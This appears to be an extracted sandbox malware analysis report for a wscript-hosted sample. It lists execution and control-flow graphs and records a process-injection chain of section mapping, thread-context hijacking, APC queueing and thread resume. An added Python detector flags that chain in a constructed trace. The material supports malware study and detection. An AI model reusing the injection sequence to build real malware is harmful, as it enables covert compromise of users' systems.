113816->113817 113818 2a1ac3b 113817->113818 113819 2a14e50 LdrLoadDll 113818->113819 113820 2a1ace7 113818->113820 113819->113820 113820->113717 113820->113820 113821->113797 113823 4ad2c1f LdrInitializeThunk 113822->113823 113824 4ad2c11 113822->113824 113823->113581 113824->113581 
113826 2a1a65c RtlFreeHeap 113825->113826 113827 2a1af30 LdrLoadDll 113825->113827 113826->113585 113827->113826 113829 2a07eb0 113828->113829 113830 2a07eab 113828->113830 113831 2a1bd10 2 API calls 113829->113831 113830->113513 113834 2a07ed5 113831->113834 113832 2a07f38 113832->113513 113833 2a19e90 2 API calls 113833->113834 113834->113832 113834->113833 113835 2a07f3e 113834->113835 113840 2a1bd10 2 API calls 113834->113840 113844 2a1a590 113834->113844 113836 2a07f64 113835->113836 113838 2a1a590 2 API calls 113835->113838 113836->113513 113839 2a07f55 113838->113839 113839->113513 113840->113834 113842 2a1a590 2 API calls 113841->113842 113843 2a0817e 113842->113843 113843->113474 113845 2a1af30 LdrLoadDll 113844->113845 113846 2a1a5ac 113845->113846 113849 4ad2c70 LdrInitializeThunk 113846->113849 113847 2a1a5c3 113847->113834 113849->113847 113851 2a1b593 113850->113851 113852 2a0acf0 LdrLoadDll 113851->113852 113853 2a09c5b 113852->113853 113853->113482 113855 2a0b063 113854->113855 113857 2a0b0e0 113855->113857 113869 2a19c60 LdrLoadDll 113855->113869 113857->113487 113859 2a1af30 LdrLoadDll 113858->113859 113860 2a0f1bb 113859->113860 113860->113495 113861 2a1a7a0 113860->113861 113862 2a1af30 LdrLoadDll 113861->113862 113863 2a1a7bf LookupPrivilegeValueW 113862->113863 113863->113491 113865 2a1af30 LdrLoadDll 113864->113865 113866 2a1a24c 113865->113866 113870 4ad2ea0 LdrInitializeThunk 113866->113870 113867 2a1a26b 113867->113492 113869->113857 113870->113867 113872 2a0b1f0 113871->113872 113873 2a0b040 LdrLoadDll 113872->113873 113874 2a0b204 113873->113874 113874->113427 113876 2a0af34 113875->113876 113948 2a19c60 LdrLoadDll 113876->113948 113878 2a0af6e 113878->113429 113880 2a0f3ac 113879->113880 113881 2a0b1c0 LdrLoadDll 113880->113881 113882 2a0f3be 113881->113882 113949 2a0f290 113882->113949 113885 2a0f3f1 113888 2a0f402 113885->113888 113890 2a1a460 2 API calls 113885->113890 113886 2a0f3d9 113887 2a0f3e4 113886->113887 113889 2a1a460 2 API 
calls 113886->113889 113887->113432 113888->113432 113889->113887 113890->113888 113892 2a0f43c 113891->113892 113968 2a0b2b0 113892->113968 113894 2a0f44e 113895 2a0f290 3 API calls 113894->113895 113896 2a0f45f 113895->113896 113897 2a0f481 113896->113897 113898 2a0f469 113896->113898 113899 2a0f492 113897->113899 113902 2a1a460 2 API calls 113897->113902 113900 2a0f474 113898->113900 113901 2a1a460 2 API calls 113898->113901 113899->113434 113900->113434 113901->113900 113902->113899 113904 2a0caa6 113903->113904 113905 2a0cab0 113903->113905 113904->113443 113906 2a0af10 LdrLoadDll 113905->113906 113907 2a0cb4e 113906->113907 113908 2a0cb74 113907->113908 113909 2a0b040 LdrLoadDll 113907->113909 113908->113443 113910 2a0cb90 113909->113910 113911 2a14a50 8 API calls 113910->113911 113912 2a0cbe5 113911->113912 113912->113443 113914 2a0d646 113913->113914 113915 2a0b040 LdrLoadDll 113914->113915 113916 2a0d65a 113915->113916 113972 2a0d310 113916->113972 113918 2a0908b 113919 2a0cc00 113918->113919 113920 2a0cc26 113919->113920 113921 2a0b040 LdrLoadDll 113920->113921 113922 2a0cca9 113920->113922 113921->113922 113923 2a0b040 LdrLoadDll 113922->113923 113924 2a0cd16 113923->113924 113925 2a0af10 LdrLoadDll 113924->113925 113926 2a0cd7f 113925->113926 113927 2a0b040 LdrLoadDll 113926->113927 113928 2a0ce2f 113927->113928 113928->113456 114001 2a0f6d0 113929->114001 113931 2a08f25 113931->113412 113932 2a08d14 113932->113931 114006 2a143a0 113932->114006 113934 2a08d70 113934->113931 114009 2a08ab0 113934->114009 113937 2a1cf00 2 API calls 113938 2a08db2 113937->113938 113939 2a1d030 3 API calls 113938->113939 113944 2a08dc7 113939->113944 113940 2a07ea0 4 API calls 113940->113944 113943 2a0c7b0 18 API calls 113943->113944 113944->113931 113944->113940 113944->113943 113945 2a08160 2 API calls 113944->113945 114014 2a0f670 113944->114014 114018 2a0f080 21 API calls 113944->114018 113945->113944 113946->113435 113947->113461 113948->113878 113950 2a0f360 
113949->113950 113951 2a0f2aa 113949->113951 113950->113885 113950->113886 113952 2a0b040 LdrLoadDll 113951->113952 113953 2a0f2cc 113952->113953 113959 2a19f10 113953->113959 113955 2a0f30e 113962 2a19f50 113955->113962 113958 2a1a460 2 API calls 113958->113950 113960 2a1af30 LdrLoadDll 113959->113960 113961 2a19f2c 113960->113961 113961->113955 113963 2a19f6c 113962->113963 113964 2a1af30 LdrLoadDll 113962->113964 113967 4ad35c0 LdrInitializeThunk 113963->113967 113964->113963 113965 2a0f354 113965->113958 113967->113965 113969 2a0b2d7 113968->113969 113970 2a0b040 LdrLoadDll 113969->113970 113971 2a0b313 113970->113971 113971->113894 113973 2a0d327 113972->113973 113981 2a0f710 113973->113981 113977 2a0d39b 113978 2a0d3a2 113977->113978 113992 2a1a270 LdrLoadDll 113977->113992 113978->113918 113980 2a0d3b5 113980->113918 113982 2a0f735 113981->113982 113993 2a081a0 113982->113993 113984 2a0d36f 113989 2a1a6b0 113984->113989 113985 2a14a50 8 API calls 113987 2a0f759 113985->113987 113987->113984 113987->113985 113988 2a1bd90 2 API calls 113987->113988 114000 2a0f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 113987->114000 113988->113987 113990 2a1af30 LdrLoadDll 113989->113990 113991 2a1a6cf CreateProcessInternalW 113990->113991 113991->113977 113992->113980 113994 2a0829f 113993->113994 113995 2a081b5 113993->113995 113994->113987 113995->113994 113996 2a14a50 8 API calls 113995->113996 113998 2a08222 113996->113998 113997 2a08249 113997->113987 113998->113997 113999 2a1bd90 2 API calls 113998->113999 113999->113997 114000->113987 114002 2a14e50 LdrLoadDll 114001->114002 114003 2a0f6ef 114002->114003 114004 2a0f6f6 SetErrorMode 114003->114004 114005 2a0f6fd 114003->114005 114004->114005 114005->113932 114019 2a0f4a0 114006->114019 114008 2a143c6 114008->113934 114010 2a1bd10 2 API calls 114009->114010 114013 2a08ad5 114010->114013 114011 2a08cea 114011->113937 114013->114011 114039 2a19850 114013->114039 114015 2a0f683 114014->114015 114087 2a19e60 
114015->114087 114018->113944 114020 2a0f4bd 114019->114020 114026 2a19f90 114020->114026 114023 2a0f505 114023->114008 114027 2a19fa6 114026->114027 114028 2a1af30 LdrLoadDll 114027->114028 114029 2a19fac 114028->114029 114037 4ad2f30 LdrInitializeThunk 114029->114037 114030 2a0f4fe 114030->114023 114032 2a19fe0 114030->114032 114033 2a1af30 LdrLoadDll 114032->114033 114034 2a19ffc 114033->114034 114038 4ad2d10 LdrInitializeThunk 114034->114038 114035 2a0f52e 114035->114008 114037->114030 114038->114035 114040 2a1bf60 2 API calls 114039->114040 114041 2a19867 114040->114041 114060 2a09310 114041->114060 114043 2a19882 114044 2a198c0 114043->114044 114045 2a198a9 114043->114045 114048 2a1bd10 2 API calls 114044->114048 114046 2a1bd90 2 API calls 114045->114046 114047 2a198b6 114046->114047 114047->114011 114049 2a198fa 114048->114049 114050 2a1bd10 2 API calls 114049->114050 114051 2a19913 114050->114051 114057 2a19bb4 114051->114057 114066 2a1bd50 LdrLoadDll 114051->114066 114053 2a19b99 114054 2a19ba0 114053->114054 114053->114057 114055 2a1bd90 2 API calls 114054->114055 114056 2a19baa 114055->114056 114056->114011 114058 2a1bd90 2 API calls 114057->114058 114059 2a19c09 114058->114059 114059->114011 114061 2a09335 114060->114061 114062 2a0acf0 LdrLoadDll 114061->114062 114063 2a09368 114062->114063 114065 2a0938d 114063->114065 114067 2a0cf20 114063->114067 114065->114043 114066->114053 114068 2a0cf4c 114067->114068 114069 2a1a1b0 LdrLoadDll 114068->114069 114070 2a0cf65 114069->114070 114071 2a0cf6c 114070->114071 114078 2a1a1f0 114070->114078 114071->114065 114075 2a0cfa7 114076 2a1a460 2 API calls 114075->114076 114077 2a0cfca 114076->114077 114077->114065 114079 2a1a20c 114078->114079 114080 2a1af30 LdrLoadDll 114078->114080 114086 4ad2ca0 LdrInitializeThunk 114079->114086 114080->114079 114081 2a0cf8f 114081->114071 114083 2a1a7e0 114081->114083 114084 2a1af30 LdrLoadDll 114083->114084 114085 2a1a7ff 114084->114085 114085->114075 114086->114081 114088 
2a1af30 LdrLoadDll 114087->114088 114089 2a19e7c 114088->114089 114092 4ad2dd0 LdrInitializeThunk 114089->114092 114090 2a0f6ae 114090->113944 114092->114090 114095 4ad2ad0 LdrInitializeThunk 114097 49acb84 114100 49aa042 114097->114100 114099 49acba5 114101 49aa06b 114100->114101 114102 49aa182 NtQueryInformationProcess 114101->114102 114117 49aa56c 114101->114117 114104 49aa1ba 114102->114104 114103 49aa1ef 114103->114099 114104->114103 114105 49aa2db 114104->114105 114106 49aa290 114104->114106 114107 49aa2fc NtSuspendThread 114105->114107 114129 49a9de2 NtCreateSection NtMapViewOfSection NtClose 114106->114129 114109 49aa30d 114107->114109 114111 49aa331 114107->114111 114109->114099 114110 49aa2cf 114110->114099 114114 49aa412 114111->114114 114120 49a9bb2 114111->114120 114113 49aa531 114116 49aa552 NtResumeThread 114113->114116 114114->114113 114115 49aa4a6 NtSetContextThread 114114->114115 114119 49aa4bd 114115->114119 114116->114117 114117->114099 114118 49aa51c NtQueueApcThread 114118->114113 114119->114113 114119->114118 114121 49a9bf7 114120->114121 114122 49a9c66 NtCreateSection 114121->114122 114123 49a9d4e 114122->114123 114124 49a9ca0 114122->114124 114123->114114 114125 49a9cc1 NtMapViewOfSection 114124->114125 114125->114123 114126 49a9d0c 114125->114126 114126->114123 114127 49a9d88 114126->114127 114128 49a9dc5 NtClose 114127->114128 114128->114114 114129->114110
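The execution graph lists the injection primitives in the order the sample uses them: NtQueryInformationProcess, NtSuspendThread, NtCreateSection, NtMapViewOfSection, NtSetContextThread, NtQueueApcThread, NtResumeThread. The detector below, an added example that is not Joe Sandbox code or part of this report, runs that ordered chain over an API trace and only fires when a process maps a section into a different process and then hijacks one of its threads. The trace line format (`pid=<n> api=<Name> target=<pid>`), the process ids and every trace line are constructed for the example; the pid 8 of the hollowing process is borrowed from the memory dump name below but the rest is made up.

```python
"""Sequence detector for the section-mapping injection chain seen in the
execution graph: NtCreateSection -> NtMapViewOfSection into another
process -> NtSetContextThread / NtQueueApcThread -> NtResumeThread.

Added example, not Joe Sandbox code. The trace format and the process
ids are assumptions made for this example; adapt LINE_RE to your trace."""
import re

LINE_RE = re.compile(r"pid=(?P<pid>\d+)\s+api=(?P<api>\w+)\s+target=(?P<target>\d+)")

# Stages that must occur, in this order, against a process other than the
# caller. Stage 2 accepts either thread-hijack primitive present in the
# graph (49aa4a6 NtSetContextThread, 49aa51c NtQueueApcThread).
REMOTE_STAGES = (
    frozenset({"NtMapViewOfSection"}),
    frozenset({"NtSetContextThread", "NtQueueApcThread"}),
    frozenset({"NtResumeThread"}),
)
# Calls that precede the chain in the graph (49aa182, 49aa2fc). They are
# recorded as context when present but not required, so a variant that
# skips them still matches.
CONTEXT_APIS = frozenset({"NtQueryInformationProcess", "NtSuspendThread"})

# Constructed trace (not from the report): process 8 hollows 2412; 1200 only
# maps a section into itself, which is what the image loader does all day;
# 3000 maps remotely but never touches a thread.
TRACE = """\
pid=8 api=NtQueryInformationProcess target=2412
pid=8 api=NtCreateSection target=8
pid=8 api=NtMapViewOfSection target=8
pid=8 api=NtMapViewOfSection target=2412
pid=8 api=NtSuspendThread target=2412
pid=8 api=NtSetContextThread target=2412
pid=8 api=NtQueueApcThread target=2412
pid=8 api=NtResumeThread target=2412
pid=1200 api=NtCreateSection target=1200
pid=1200 api=NtMapViewOfSection target=1200
pid=1200 api=NtClose target=1200
pid=3000 api=NtMapViewOfSection target=3100
pid=3000 api=NtResumeThread target=3100
"""


def parse_trace(text):
    """Return (pid, api, target) triples; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append((int(m["pid"]), m["api"], int(m["target"])))
    return events


def find_section_injection(events):
    """Return one finding per (pid, target) pair that completes the chain.

    A finding needs a section created by pid plus all three remote stages
    against target, in order. Calls where target == pid never advance the
    chain, which keeps ordinary local section mapping out of the results."""
    has_section = set()   # pids that called NtCreateSection
    progress = {}         # (pid, target) -> (next stage index, apis seen)
    findings = []
    for pid, api, target in events:
        if api == "NtCreateSection":
            has_section.add(pid)
            continue
        if target == pid:
            continue
        stage, seen = progress.get((pid, target), (0, ()))
        if api in CONTEXT_APIS:
            seen = seen + (api,)
        elif stage < len(REMOTE_STAGES) and api in REMOTE_STAGES[stage]:
            seen = seen + (api,)
            stage += 1
            if stage == len(REMOTE_STAGES) and pid in has_section:
                findings.append({"pid": pid, "target": target, "chain": seen})
        elif stage > 0 and api in REMOTE_STAGES[stage - 1]:
            # second primitive of the same stage, e.g. an APC queued after
            # the context was already rewritten, as in the graph
            seen = seen + (api,)
        progress[(pid, target)] = (stage, seen)
    return findings


if __name__ == "__main__":
    for f in find_section_injection(parse_trace(TRACE)):
        print(f"pid {f['pid']} -> {f['target']}: {' -> '.join(f['chain'])}")
```

The cross-process requirement is what keeps this rule quiet on a normal host: every image load creates and maps a section, but only an injector maps one into a handle that refers to another process and then resumes a thread there.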

Control-flow Graph (rendered graph not included in this extract; the NtQueryInformationProcess call belongs to the 49aa042 routine shown in the execution graph above)

APIs
• NtQueryInformationProcess.NTDLL ref: 049AA19F
Strings
Memory Dump Source
• Source File: 00000008.00000002.4588686644.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_49a0000_wscript.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction ID: bdd50d13fd7390d4184de167f8ba89e236d7aeb72961063c3faa6a56caa5564d
• Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction Fuzzy Hash: 71F14174918A4C8FDBA5EF68C894AEEB7E1FF98304F40462AD44ED7650DF34A641CB81

Control-flow Graph (the executed / not-executed colouring of the rendered graph did not survive extraction; the basic blocks and their calls are kept below)

control_flow_graph for the routine at 49a9baf-49a9ddc: 49a9baf-49a9bef; 49a9bf2 (call 49a9102); 49a9bf7-49a9bfe; 49a9c00 and the loop 49a9c02-49a9c0a; 49a9c0c-49a9c9a (call 49ab942 twice, then NtCreateSection), which continues either to 49a9d5a-49a9d68 or to 49a9ca0-49a9d0a (call 49ab942, then NtMapViewOfSection); after the map 49a9d0c-49a9d4c or 49a9d52; 49a9d4e-49a9d4f; 49a9d69-49a9d6b branches to 49a9d88-49a9ddc (call 49acd62, then NtClose) or to 49a9d6d-49a9d72 and 49a9d74-49a9d86 (call 49a9172) before reaching the NtClose block.
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.4588686644.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_49a0000_wscript.jbxd
Similarity
• API ID: Section$CloseCreateView
• String ID: @$@
• API String ID: 1133238012-149943524
• Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction ID: 6d13c96c52a1f7e4f799a4c0bdccd907ca4e217c63256a5b7604676c7978ae1c
• Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction Fuzzy Hash: 98617170518B488FDB58EF68D8856AABBE0FF98314F50062EE58AC3651DF35E441CB86

Control-flow Graph (same routine as the preceding graph, entered at 49a9bb2 instead of 49a9baf; the executed / not-executed colouring did not survive extraction)

control_flow_graph for 49a9bb2-49a9ddc: 49a9bb2-49a9bfe (call 49a9102); 49a9c00 and the loop 49a9c02-49a9c0a; 49a9c0c-49a9c9a (call 49ab942 twice, then NtCreateSection), which continues either to 49a9d5a-49a9d68 or to 49a9ca0-49a9d0a (call 49ab942, then NtMapViewOfSection); after the map 49a9d0c-49a9d4c or 49a9d52; 49a9d4e-49a9d4f; 49a9d69-49a9d6b branches to 49a9d88-49a9ddc (call 49acd62, then NtClose) or to 49a9d6d-49a9d72 and 49a9d74-49a9d86 (call 49a9172) before reaching the NtClose block.
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588686644.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_49a0000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Section$CreateView
                                                                                                                                                                                                                      • String ID: @$@
                                                                                                                                                                                                                      • API String ID: 1585966358-149943524
                                                                                                                                                                                                                      • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                                                                      • Instruction ID: 60c586ff7f798482dce1309f0f659badb24995ffd7e70995fae691244b214319
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35515FB0618B088FD758DF18D8956AABBE0FB98314F50062EF58ED3651DF35E481CB86

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtQueryInformationProcess.NTDLL ref: 049AA19F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588686644.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_49a0000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 1778838933-4108050209
                                                                                                                                                                                                                      • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                                                                      • Instruction ID: 4397ea8a0cec714479c25c45d5d220df961099df720d3f35fdedc4c9ed7acc70
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5512E70914A8C8FDB69EF68C8946EEB7F4FB98305F40462ED44AD7250DF309645CB41

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 542 2a1a2ea-2a1a2ee 543 2a1a2f0-2a1a329 call 2a1af30 542->543 544 2a1a338-2a1a381 call 2a1af30 NtCreateFile 542->544
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02A14BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A14BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A1A37D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID: .z`
                                                                                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                                                                                      • Opcode ID: 60ba23054b50635cf57a664ecaabc91fb639b4254705df40474ddd73745a59cc
                                                                                                                                                                                                                      • Instruction ID: f835a02893075112cb502e43ad78d72380c3869a27569ed88239a913d37146bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60ba23054b50635cf57a664ecaabc91fb639b4254705df40474ddd73745a59cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C811D7B6215249ABCB08DF98DC85DEB77ADAF8C314F058649FA4DA7241D630E811CBA4

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 550 2a1a32a-2a1a346 551 2a1a34c-2a1a381 NtCreateFile 550->551 552 2a1a347 call 2a1af30 550->552 552->551
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02A14BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A14BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A1A37D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID: .z`
                                                                                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                                                                                      • Opcode ID: f0b03f65585031601ef09eec40b99b8fc33a98648d44dc91f8ac0b2b44fe10bd
                                                                                                                                                                                                                      • Instruction ID: 4cec1df7c0998646ffb0cd12aecf3f3d1c0d2834e238a21c24f5bfefb0b68cff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0b03f65585031601ef09eec40b99b8fc33a98648d44dc91f8ac0b2b44fe10bd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF01B6B2251108AFCB08CF88DC94EEB77ADAF8C754F558248FA1D97245D630E851CBA4

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 553 2a1a330-2a1a346 554 2a1a34c-2a1a381 NtCreateFile 553->554 555 2a1a347 call 2a1af30 553->555 555->554
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02A14BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A14BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A1A37D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID: .z`
                                                                                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                                      • Instruction ID: 59d79da884170f7458ba3fe92914c4c5392d8942ae9cb4e697b498b672b6bb5c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F0B2B2211208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtReadFile.NTDLL(02A14D72,5EB65239,FFFFFFFF,02A14A31,?,?,02A14D72,?,02A14A31,FFFFFFFF,5EB65239,02A14D72,?,00000000), ref: 02A1A425
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                                      • Instruction ID: 8e8751fd3d2cd755eb0ebb30f1ccf71b5dda9535ccbd87beea3d0033eb6e24b1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FF0BDB2210108AFCB14DF89DC80DEB77ADEF8C754F158249BE1D97241D630E811CBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtReadFile.NTDLL(02A14D72,5EB65239,FFFFFFFF,02A14A31,?,?,02A14D72,?,02A14A31,FFFFFFFF,5EB65239,02A14D72,?,00000000), ref: 02A1A425
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: e36ec178e8ffe1fe657c74cf8b232a2ea8ae32859f4c1d9b2af2f1176d4cfa76
                                                                                                                                                                                                                      • Instruction ID: d7d73081238f9ac9984501ba988956c7dbffff69ae43b66fa4a917765682a61e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e36ec178e8ffe1fe657c74cf8b232a2ea8ae32859f4c1d9b2af2f1176d4cfa76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F01DB2210148ABCB09DF98D890CEB7BADAF8C314B15869DFD0C97216C634E855CBA0
APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A02D11,00002000,00003000,00000004), ref: 02A1A549
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: feba9c7679bc1ab7f4ebbbc94c28323aad5d88c0d8185c2a72d654f74b30e2de
• Instruction ID: dbb6ed84c4c4eeb36d5a78b6c11d9cd49a4157999821492d864b8e2b56191346
• Opcode Fuzzy Hash: feba9c7679bc1ab7f4ebbbc94c28323aad5d88c0d8185c2a72d654f74b30e2de
• Instruction Fuzzy Hash: 55F05EB6210104AFDB14CF88CC80EE77B69AF8C314F158549FE489B241C630E811CFA0
APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A02D11,00002000,00003000,00000004), ref: 02A1A549
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction ID: 0f3945160fa33db1bdf350e1959fcde9abd3b2d7802f35035ad0b2f2d0ff0551
• Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction Fuzzy Hash: 95F015B2210208ABCB18DF89CC80EAB77ADAF88754F118149BE0897241C630F811CBA4
APIs
• NtClose.NTDLL(02A14D50,?,?,02A14D50,00000000,FFFFFFFF), ref: 02A1A485
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: bd82444856bed58548c441bf307f6eaadb065f8503de15c78d6c445b76fc939d
• Instruction ID: 2ecac67c8e5c8882dc5714b2a4937746a595835e0b1e0e407b206ac0942efbfe
